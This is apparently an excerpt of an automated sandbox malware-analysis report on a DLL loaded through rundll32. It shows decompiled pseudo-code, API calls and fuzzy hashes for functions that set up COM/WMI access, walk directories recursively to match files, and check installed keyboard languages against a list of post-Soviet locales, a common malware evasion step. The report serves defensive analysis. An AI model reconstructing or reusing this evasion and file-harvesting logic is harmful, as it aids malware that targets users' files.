0x10017d4f
0x10017d52
0x10017d52
0x10017d55
0x10017d58
0x10017d5c
0x00000000
0x00000000
0x10017d79
0x10017d7e
0x10017e66
0x00000000
0x00000000
0x10017e6f
0x10017e72
0x10017e7e
0x00000000
0x10017e7e
0x10017d84
0x10017d87
0x10017d89
0x10017d8c
0x10017d8f
0x10017d92
0x10017d9b
0x10017d9b
0x10017d9d
0x10017da3
0x10017da5
0x10017da8
0x10017dab
0x10017dae
0x10017db1
0x10017db4
0x10017db4
0x10017dbb
0x10017dbe
0x10017dc1
0x10017dc4
0x10017dc7
0x10017dc7
0x10017dcc
0x10017dcf
0x10017dd1
0x10017dd6
0x00000000
0x00000000
0x10017e8a
0x00000000
0x00000000
0x10017e93
0x10017e96
0x10017ea6
0x10017ea6
0x10017ddc
0x10017ddf
0x10017e3b
0x10017df5
0x10017df5
0x10017dfb
0x10017e01
0x10017eb2
0x10017eb6
0x10017eb8
0x10017ebe
0x00000000
0x00000000
0x10017ec4
0x10017ecb
0x10017eed
0x10017ef3
0x10017f1f
0x10017f23
0x10017f25
0x10017f27
0x10017f27
0x10017f27
0x10017f2b
0x10017f2b
0x10017ef5
0x10017efb
0x10017efd
0x10017f01
0x10017f03
0x10017f05
0x10017f05
0x10017f05
0x10017f07
0x10017f0b
0x10017f11
0x10017f13
0x10017f15
0x10017f15
0x10017f15
0x10017f19
0x10017f19
0x10017f11
0x10017f01
0x10017ecd
0x10017ecf
0x10017ed3
0x10017ed5
0x10017ed7
0x10017ed7
0x10017ed7
0x10017edb
0x10017edb
0x10017ed3
0x10017f2d
0x10017f2f
0x10017f2f
0x10017f2f
0x10017f31
0x10017f35
0x00000000
0x10017f35
0x10017e0b
0x10017e0d
0x10017e12
0x10017e1a
0x10017e1d
0x10017e20
0x10017e26
0x10017e26
0x10017e26
0x10017e28
0x10017e2c
0x00000000
0x10017e43
0x10017e43
0x10017e46
0x10017e48
0x10017e4b
0x10017e4e
0x10017e51
0x10017e54
0x10017e57
0x10017e57
0x10017e57
0x10017e59
0x10017d62
0x10017d66
0x00000000
0x00000000
0x00000000
0x10017d66
0x10017e3b
0x10017de1
0x10017de4
0x10017de7
0x10017dea
0x10017df3
0x00000000
0x10017df3
0x10017d5e
0x10017d61
0x00000000
0x10017d6c
0x10017d6c
0x00000000
0x10017d72

Strings

ineI, xrefs: 10017AAF
Genu, xrefs: 10017A9F
ntel, xrefs: 10017AA7
invalid distance code, xrefs: 10017F3E
invalid distance too far back, xrefs: 10017F6A
invalid literal/length code, xrefs: 10017F5A

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: Genu$ineI$invalid distance code$invalid distance too far back$invalid literal/length code$ntel
API String ID: 0-3089872807
Opcode ID: 891c31732df7ee9c86fe88bae22decff034309e3cafc24a05e2a0713e93e6e3b
Instruction ID: 5938c8f960f2e2343e4500dd64128025537aebf860d0862d27eb1a5e10829eca
Opcode Fuzzy Hash: 891c31732df7ee9c86fe88bae22decff034309e3cafc24a05e2a0713e93e6e3b
Instruction Fuzzy Hash: B3121532A083468FD715DE38C49021ABBF1FF88394F558A2CE8999BB41D771ED89C781

Uniqueness

Uniqueness Score: -1.00%

Function 1000D972 Relevance: 7.6, APIs: 5, Instructions: 87
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E1000D972(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x1001d928, 0, 1, 0x1001d938, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E10009525(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}

0x1000d97f
0x1000d982
0x1000d985
0x1000d996
0x1000d99c
0x1000d9ad
0x1000d9b5
0x1000da06
0x1000da06
0x1000da0b
0x1000da10
0x1000da10
0x1000da13
0x1000da18
0x1000da1d
0x1000da1d
0x1000da20
0x1000d9b7
0x1000d9b8
0x1000d9be
0x1000d9cf
0x1000d9d4
0x00000000
0x1000d9d6
0x1000d9e3
0x1000d9eb
0x00000000
0x1000d9ed
0x1000d9ef
0x1000d9f7
0x00000000
0x1000d9f9
0x1000d9fc
0x1000da02
0x1000da02
0x1000d9f7
0x1000d9eb
0x1000d9d4
0x1000da25

APIs

CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,1000DCA3,000010FB,00000000,00000000,00000005), ref: 1000D985
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,1000DCA3,000010FB,00000000,00000000,00000005), ref: 1000D996
CoCreateInstance.OLE32(1001D928,00000000,00000001,1001D938,00000000,?,1000DCA3,000010FB,00000000,00000000,00000005), ref: 1000D9AD
SysAllocString.OLEAUT32(00000000), ref: 1000D9B8
CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,1000DCA3,000010FB,00000000,00000000,00000005), ref: 1000D9E3

Part of subcall function 10009525: RtlAllocateHeap.76D4C8D1(00000008,?,?,1000990B,00000100,00000001,100010BC), ref: 10009533

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
String ID:
API String ID: 1610782348-0
Opcode ID: 3b6d31de2b3605a8e01a70cf34acd78c63f4aacfa909cfe4443a4393862ed2a2
Instruction ID: d4f531dc68e55bc41b3b40657ad9fbb231386c8691297bdc3f0db5db7518656b
Opcode Fuzzy Hash: 3b6d31de2b3605a8e01a70cf34acd78c63f4aacfa909cfe4443a4393862ed2a2
Instruction Fuzzy Hash: C5212530604255BBEB249B66CC48E6FBFBCEFC7B95F00415EB501AA2A0D671DA40CA31

Uniqueness

Uniqueness Score: -1.00%

Function 69372030 Relevance: 7.6, APIs: 5, Instructions: 55timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 69372069
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,693413B9), ref: 6937207A
GetCurrentThreadId.KERNEL32 ref: 69372082
GetTickCount.KERNEL32 ref: 6937208A
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,693413B9), ref: 69372099

Memory Dump Source

Source File: 0000000E.00000002.33863545872.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000E.00000002.33863518149.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863839229.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864047567.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864078936.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864107791.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864265674.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_69340000_rundll32.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 65dc85ff24c29831b7545104835764622879de7d03e6565988e2b04e2d8a0f63
Instruction ID: 8b3cb01ddfc5a9076dee4c8247cd5aedbcba059eea28e38c671a831fda68af8c
Opcode Fuzzy Hash: 65dc85ff24c29831b7545104835764622879de7d03e6565988e2b04e2d8a0f63
Instruction Fuzzy Hash: 7F1173B55053418FCB10EF79EA8955BBBE8FB89364F010839E865CB300EA35D449CB92

Uniqueness

Uniqueness Score: -1.00%

Function 693720E0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 6937212F
UnhandledExceptionFilter.KERNEL32 ref: 6937213F
GetCurrentProcess.KERNEL32 ref: 69372148
TerminateProcess.KERNEL32 ref: 69372159
abort.MSVCRT ref: 69372162

Memory Dump Source

Source File: 0000000E.00000002.33863545872.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000E.00000002.33863518149.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863839229.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864047567.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864078936.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864107791.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864265674.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_69340000_rundll32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
String ID:
API String ID: 520269711-0
Opcode ID: 7a4934d67a6d75af45ca9970d86da4f5df354308f23148e89ccb0b4e5d377342
Instruction ID: 0a5301f01946ca17772e9514783ebaa5283c7045d7d6f0960cb8cc4bc0236249
Opcode Fuzzy Hash: 7a4934d67a6d75af45ca9970d86da4f5df354308f23148e89ccb0b4e5d377342
Instruction Fuzzy Hash: D91113B5804381CFDB00EF69C64561ABBF4FB4A304F008A29E9A89B300E77899458F52

Uniqueness

Uniqueness Score: -1.00%

Function 693720DC Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 6937212F
UnhandledExceptionFilter.KERNEL32 ref: 6937213F
GetCurrentProcess.KERNEL32 ref: 69372148
TerminateProcess.KERNEL32 ref: 69372159
abort.MSVCRT ref: 69372162

Memory Dump Source

Source File: 0000000E.00000002.33863545872.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000E.00000002.33863518149.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863839229.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864047567.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864078936.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864107791.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864265674.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_69340000_rundll32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
String ID:
API String ID: 520269711-0
Opcode ID: 8d24d0fce71a20ab2fd4d1a0415f9396b5f982dc0ada785d4f02f9b9fc2236b5
Instruction ID: d718274709b9049c1d57c63cc6beaa3bc162dd1cc57d898e45b9b0af26a2eaad
Opcode Fuzzy Hash: 8d24d0fce71a20ab2fd4d1a0415f9396b5f982dc0ada785d4f02f9b9fc2236b5
Instruction Fuzzy Hash: F411D7B6800385CFDF00EFA9D7496597BF8FB07304F008629E9A59B301E77899458F56

Uniqueness

Uniqueness Score: -1.00%

Function 1000C547 Relevance: 3.1, APIs: 2, Instructions: 105
fileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E1000C547(void* __ecx, void* __fp0, intOrPtr _a16) {
				char _v12;
				WCHAR* _v16;
				struct _WIN32_FIND_DATAW _v608;
				WCHAR* _t24;
				intOrPtr _t31;
				intOrPtr _t41;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t54;
				void* _t59;
				char _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t75;

				_t75 = __fp0;
				_push(0);
				_t48 = __ecx;
				_push(L"\\*");
				_t24 = E10009DC8(__ecx);
				_t63 = _t62 + 0xc;
				_v16 = _t24;
				if(_t24 == 0) {
					return _t24;
				}
				_t59 = FindFirstFileW(_t24,  &_v608);
				if(_t59 == 0xffffffff) {
					L14:
					return E1000953B( &_v16, 0xfffffffe);
				} else {
					goto L2;
				}
				do {
					L2:
					if(E1000C51F( &(_v608.cFileName)) != 0) {
						goto L12;
					}
					if((_v608.dwFileAttributes & 0x00000010) != 0) {
						L10:
						_push(0);
						_push( &(_v608.cFileName));
						_push("\\");
						_t60 = E10009DC8(_t48);
						_t63 = _t63 + 0x10;
						_v12 = _t60;
						if(_t60 != 0) {
							_t54 =  *0x10020d58; // 0x4a1f900
							 *((intOrPtr*)(_t54 + 0xc4))(1);
							_push(1);
							_push(1);
							_push(0);
							E1000C547(_t60, _t75, 1, 5, E10011316, _a16);
							_t63 = _t63 + 0x1c;
							E1000953B( &_v12, 0xfffffffe);
						}
						goto L12;
					}
					_t61 = 0;
					do {
						_t7 = _t61 + 0x10020e8c; // 0x0
						_push( *_t7);
						_push( &(_v608.cFileName));
						_t41 =  *0x10020d90; // 0x4a1fc28
						if( *((intOrPtr*)(_t41 + 0x18))() == 0) {
							goto L8;
						}
						_t45 = E10011316(_t75, _t48,  &_v608, _a16);
						_t63 = _t63 + 0xc;
						if(_t45 == 0) {
							break;
						}
						_t46 =  *0x10020d58; // 0x4a1f900
						 *((intOrPtr*)(_t46 + 0xc4))(1);
						L8:
						_t61 = _t61 + 4;
					} while (_t61 < 4);
					if((_v608.dwFileAttributes & 0x00000010) == 0) {
						goto L12;
					}
					goto L10;
					L12:
				} while (FindNextFileW(_t59,  &_v608) != 0);
				_t31 =  *0x10020d58; // 0x4a1f900
				 *((intOrPtr*)(_t31 + 0x84))(_t59);
				goto L14;
			}

0x1000c547
0x1000c553
0x1000c555
0x1000c557
0x1000c55d
0x1000c562
0x1000c565
0x1000c56a
0x1000c686
0x1000c686
0x1000c57e
0x1000c583
0x1000c675
0x00000000
0x00000000
0x00000000
0x00000000
0x1000c589
0x1000c589
0x1000c596
0x00000000
0x00000000
0x1000c5a4
0x1000c5f7
0x1000c5f7
0x1000c5ff
0x1000c600
0x1000c60b
0x1000c60d
0x1000c610
0x1000c615
0x1000c617
0x1000c61f
0x1000c625
0x1000c627
0x1000c629
0x1000c63e
0x1000c643
0x1000c64c
0x1000c652
0x00000000
0x1000c615
0x1000c5a6
0x1000c5a8
0x1000c5a8
0x1000c5a8
0x1000c5b4
0x1000c5b5
0x1000c5bf
0x00000000
0x00000000
0x1000c5cc
0x1000c5d1
0x1000c5d6
0x00000000
0x00000000
0x1000c5d8
0x1000c5df
0x1000c5e5
0x1000c5e5
0x1000c5e8
0x1000c5f5
0x00000000
0x00000000
0x00000000
0x1000c653
0x1000c661
0x1000c669
0x1000c66f
0x00000000

APIs

FindFirstFileW.KERNEL32(00000000,?,?,00000000,00000000), ref: 1000C578
FindNextFileW.KERNEL32(00000000,?), ref: 1000C65B

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: FileFind$FirstNext
String ID:
API String ID: 1690352074-0
Opcode ID: bc104e7280cc2e0da98bdee975f8fa39e31bae445942418d196ed17285db0488
Instruction ID: 7b2f7127e2c913cda9fb88d985b2f6b10647df60f7fc8f8a01ff42f64e48081d
Opcode Fuzzy Hash: bc104e7280cc2e0da98bdee975f8fa39e31bae445942418d196ed17285db0488
Instruction Fuzzy Hash: FA31C371A013196FFB10DBA4DC89FDA37A8EB406D1F1001A5F905A61D5EB71EA818B90

Uniqueness

Uniqueness Score: -1.00%

Function 1000338F Relevance: 1.6, APIs: 1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E1000338F() {
				signed int _v8;
				intOrPtr _v12;
				char _v24;
				signed int _t31;
				intOrPtr _t32;
				signed int _t33;
				void* _t35;
				intOrPtr _t37;
				intOrPtr _t38;
				intOrPtr _t41;
				intOrPtr _t44;
				intOrPtr _t45;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t51;
				intOrPtr _t52;
				int _t55;
				void* _t58;
				void* _t59;
				void* _t60;
				void* _t62;
				void* _t70;
				void* _t73;

				_v8 = _v8 & 0x00000000;
				_t45 =  *0x10020e00; // 0x0
				_t31 =  *0x10020e04; // 0x0
				_t46 = _t45 + 0x3c;
				_t51 =  *0x10020dec; // 0x0
				_t44 =  *0x10020de8; // 0x0
				asm("adc eax, 0x0");
				_v12 = _t51;
				_t60 = _t51 - _t31;
				if(_t60 < 0 || _t60 <= 0 && _t44 <= _t46) {
					L22:
					return _t31;
				} else {
					_t55 = 0;
					 *0x10020e00 = _t44;
					 *0x10020e04 = _t51;
					_t62 =  *0x10020dfc - _t55; // 0x0
					if(_t62 <= 0) {
						goto L22;
					}
					_t58 = 0;
					do {
						_t32 =  *0x10020e08; // 0x0
						if( *((intOrPtr*)(_t58 + _t32)) == 0) {
							L18:
							_t31 = _v8;
							goto L19;
						}
						_t52 =  *((intOrPtr*)(_t58 + _t32 + 0x18));
						if(_t52 == 0 || E1000C2CB(_t52) == 0) {
							_t47 =  *0x10020e08; // 0x0
							if( *((intOrPtr*)(_t58 + _t47 + 4)) == 0 ||  *((intOrPtr*)(_t58 + _t47 + 0x1c)) != 0) {
								_t33 =  *(_t58 + _t47);
								if(_t33 <= 0) {
									goto L18;
								}
								asm("cdq");
								_t35 = _t33 * 0x3c +  *((intOrPtr*)(_t58 + _t47 + 0x10));
								asm("adc edx, [esi+ecx+0x14]");
								_t70 = _t52 - _v12;
								if(_t70 > 0 || _t70 >= 0 && _t35 > _t44) {
									goto L18;
								} else {
									goto L14;
								}
							} else {
								L14:
								if( *((intOrPtr*)(_t58 + _t47 + 0xc)) == 0) {
									E100060E9( *((intOrPtr*)(_t58 + _t47 + 8)), 0, 0, 0);
									_t59 = _t59 + 0x10;
								} else {
									GetLocaleInfoA(_t55, 0x5a,  &_v24, 4);
									_t41 =  *0x10020e08; // 0x0
									 *((intOrPtr*)(_t58 + _t41 + 0xc))();
								}
								_t37 =  *0x10020e08; // 0x0
								 *((intOrPtr*)(_t58 + _t37 + 0x10)) = _t44;
								 *((intOrPtr*)(_t58 + _t37 + 0x14)) = _v12;
								_t38 =  *0x10020e08; // 0x0
								 *((intOrPtr*)(_t58 + _t38 + 0x1c)) = 1;
								_t31 = 1;
								_v8 = 1;
								goto L19;
							}
						} else {
							goto L18;
						}
						L19:
						_t55 = _t55 + 1;
						_t58 = _t58 + 0x20;
						_t73 = _t55 -  *0x10020dfc; // 0x0
					} while (_t73 < 0);
					if(_t31 != 0) {
						_t31 = E100036A4();
					}
					goto L22;
				}
			}

0x10003395
0x10003399
0x1000339f
0x100033a4
0x100033a7
0x100033ae
0x100033b4
0x100033b7
0x100033bc
0x100033be
0x100034b2
0x100034b6
0x100033ce
0x100033ce
0x100033d0
0x100033d6
0x100033dc
0x100033e2
0x00000000
0x00000000
0x100033e8
0x100033ea
0x100033ea
0x100033f3
0x10003496
0x10003496
0x00000000
0x10003496
0x100033f9
0x100033ff
0x1000340e
0x10003419
0x10003422
0x10003427
0x00000000
0x00000000
0x1000342c
0x1000342d
0x10003431
0x10003435
0x10003438
0x00000000
0x00000000
0x00000000
0x00000000
0x10003440
0x10003440
0x10003445
0x1000346b
0x10003470
0x10003447
0x10003450
0x10003456
0x1000345b
0x1000345b
0x10003473
0x1000347b
0x1000347f
0x10003485
0x1000348b
0x1000348f
0x10003491
0x00000000
0x10003491
0x00000000
0x00000000
0x00000000
0x10003499
0x10003499
0x1000349a
0x1000349d
0x1000349d
0x100034ab
0x100034ad
0x100034ad
0x00000000
0x100034ab

APIs

GetLocaleInfoA.KERNEL32(00000000,0000005A,?,00000004,?,00000000,00000001,?,?,10002821), ref: 10003450

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 12f8d613c77fa2b6b561c5fc77a78a839f321e9505c0cf5ae6a38080ea26a529
Instruction ID: e917d9a377e98bf3d5a9616198259dbf32bf4c4c92623d05dc2f8582aaf3a776
Opcode Fuzzy Hash: 12f8d613c77fa2b6b561c5fc77a78a839f321e9505c0cf5ae6a38080ea26a529
Instruction Fuzzy Hash: 6A315E716007109BF757CF55CD85B2BB7EAEB40384F65C82EE5429A25AC3B0F982CB91

Uniqueness

Uniqueness Score: -1.00%

Function 10002C5E Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10002C5E() {
				signed int _v8;
				signed int _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				signed int _v40;
				intOrPtr _v44;
				char _v56;
				char _v312;
				short _t31;
				short _t32;
				short _t33;
				short _t34;
				short _t35;
				short _t36;
				short _t37;
				short _t38;
				short _t39;
				short _t40;
				short _t41;
				intOrPtr _t43;
				intOrPtr _t44;
				signed int _t48;
				signed int _t51;
				signed int _t52;
				short _t54;
				signed int _t57;
				signed int _t59;
				int _t60;
				void* _t62;

				_t31 = 0x19;
				_v36 = _t31;
				_t59 = 0;
				_t32 = 0x23;
				_v34 = _t32;
				_t33 = 0x3f;
				_v32 = _t33;
				_t34 = 0x2c;
				_v30 = _t34;
				_t35 = 0x2b;
				_v28 = _t35;
				_t36 = 0x37;
				_t54 = 0x40;
				_v26 = _t36;
				_t37 = 0x43;
				_v22 = _t37;
				_t38 = 0x28;
				_v20 = _t38;
				_t39 = 0x42;
				_v18 = _t39;
				_t40 = 0x22;
				_v16 = _t40;
				_t41 = 0x1a;
				_v14 = _t41;
				_t43 =  *0x10020d50; // 0x4a1fa80
				_v8 = 0;
				_v24 = _t54;
				_t44 =  *((intOrPtr*)(_t43 + 0x38))(_t54,  &_v312);
				_t51 = 0;
				_v44 = _t44;
				_v12 = 0;
				if(_t44 != 0) {
					do {
						_t57 = 0;
						_t48 =  *(_t62 + _t51 * 4 - 0x134) & 0x3ff;
						_v40 = _t48;
						_t52 = _t48;
						do {
							_t60 =  *(_t62 + _t57 * 2 - 0x20) & 0x0000ffff;
							GetLocaleInfoA(3, _t60,  &_v56, 4);
							if(_t52 != _t60) {
								_t59 = _v8;
							} else {
								_t59 = 1;
								_v8 = 1;
							}
							_t57 = _t57 + 1;
						} while (_t57 < 0xc);
						_t51 = _v12 + 1;
						_v12 = _t51;
					} while (_t51 < _v44);
				}
				return _t59;
			}

0x10002c6b
0x10002c6e
0x10002c72
0x10002c74
0x10002c77
0x10002c7b
0x10002c7e
0x10002c82
0x10002c85
0x10002c89
0x10002c8c
0x10002c90
0x10002c93
0x10002c96
0x10002c9a
0x10002c9d
0x10002ca1
0x10002ca4
0x10002ca8
0x10002cab
0x10002caf
0x10002cb2
0x10002cb6
0x10002cb7
0x10002cc2
0x10002cc8
0x10002ccb
0x10002ccf
0x10002cd2
0x10002cd4
0x10002cd7
0x10002cdc
0x10002cdf
0x10002cef
0x10002cf1
0x10002cf4
0x10002cf7
0x10002cf9
0x10002cf9
0x10002d07
0x10002d10
0x10002d1a
0x10002d12
0x10002d14
0x10002d15
0x10002d15
0x10002d1d
0x10002d1e
0x10002d26
0x10002d27
0x10002d2a
0x10002d2f
0x10002d35

APIs

GetLocaleInfoA.KERNEL32(00000003,?,?,00000004,00000000), ref: 10002D07

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: a1b938862a9920fdab6539c62caee96879eb47422c256fb5aa8c4470ff4a9cdd
Instruction ID: 918cc5d447bd8afb92986e08f6f4ef1d20a23fc78e2c3519b4597a407533d554
Opcode Fuzzy Hash: a1b938862a9920fdab6539c62caee96879eb47422c256fb5aa8c4470ff4a9cdd
Instruction Fuzzy Hash: CB218276E54319AAFB00DFD5A891BFEB7B4EF48750F20141BEA04EB190D2B10E41C795

Uniqueness

Uniqueness Score: -1.00%

Function 10012137 Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10012137(void* __eflags) {
				char _v16;
				intOrPtr _t10;
				intOrPtr* _t19;

				_t19 = E10013A5B(0x14);
				if(_t19 != 0) {
					 *(_t19 + 0xc) =  *(_t19 + 0xc) & 0x00000000;
					 *((intOrPtr*)(_t19 + 8)) = 8;
					 *_t19 = 1;
					 *((intOrPtr*)(_t19 + 4)) = 1;
					_t10 = E10013A5B(0x20);
					 *((intOrPtr*)(_t19 + 0x10)) = _t10;
					if(_t10 != 0) {
						return _t19;
					}
					E10013A49(_t10, _t19);
					L2:
					return 0;
				}
				GetLocaleInfoA(0x100, 0x200,  &_v16, 4);
				goto L2;
			}

0x10012145
0x1001214a
0x10012166
0x1001216d
0x10012174
0x10012178
0x1001217b
0x10012180
0x10012186
0x00000000
0x10012191
0x10012189
0x10012162
0x00000000
0x10012162
0x1001215c
0x00000000

APIs

GetLocaleInfoA.KERNEL32(00000100,00000200,00000004,00000004,00000000), ref: 1001215C

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

